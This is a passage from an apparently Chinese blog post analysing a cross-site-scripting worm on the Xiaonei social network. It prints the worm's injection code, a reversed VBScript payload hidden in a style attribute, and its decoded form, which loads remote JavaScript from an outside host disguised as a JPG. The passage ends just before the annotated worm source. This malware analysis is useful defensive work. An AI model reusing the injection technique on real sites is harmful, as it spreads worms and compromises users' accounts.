在一次查看校内网网页源程序的时候无意间发现一个校内蠕虫，开始还以为是我的网页有问题，就随便打开几个人的页面查看，发现许多人的页面上也有这段代码。

<a name="mya113" id="mya113" style='background:url(vbscript:execute(StrReverse(")""311aym""(dIyBtnemelEteg.tnemucod,s erofeBtresni.edoNtnerap.)""311aym""(dIyBtnemelEteg.tnemucod :""gpj.sjnx/segami/moc.ecafosos.www//:

ptth""=crs.s:)""tpircs""(tnemelEetaerc.tnemucod=s tes")) )'>

以上代码出现在日志的开头，只有查看源文件才能发现。它将vbscript调了个头写，调回来就变成以下内容：
set s=document.createElement("script")
s.src=http://hack.77169.com/UploadFiles_8057/200710/20071023111233624.jpg
document.getElementById("mya113").parentNode.insertBefore s,document.getElementById("mya113")

    在这段脚本中它又新建了一个script，它的src指向http://hack.77169.com/UploadFiles_8057/200710/20071023111233624.jpg（别相信后缀），下载加这个“jpg”用记事和UE打开都发现它填充了大量的asc的00（真不敢相信填充了那么多00 IE还能执行），不过用Dreamweaver打开显示正常，拷出JS。然后花了几乎一天的时间来分析这个js文件，发现它完完全全是一个基于ajax的蠕虫。

    值得注意的是作者好像很低调，在蠕虫代码中除了感染就是隐藏，没有一行破坏性的代码，仅仅是加了一个站长统计，估计作者是用来研究蠕虫传播情况的，因为站长统计要密码我们进不去，所以不知道具体的感染情况，但是我刚才在google上搜了下sosoface，还是看到这个网站的流量图：
http://www.chinarank.org.cn/detail/Info.do?url=www.sosoface.com&r=1192875678218

    从图上可以看到流量在几天时间里大增，这些天应该是蠕虫感染的时间。日访问人数从0猛增到500百万人/天，也就是每天那个JPG要被访问5亿次考虑到一个人可能访问多个页面，粗略估计应该至少有几百万人受到感染。另外，也就在大概两三天前这个蠕虫应该是被校内的人发现了，一夜之间全部消失了。 Sosoface也被停了。

    下面来分析感染代码，我直接把注释写在JS中了，原本的程序可是一行注释也没有的。看时从最底下的start函数看起：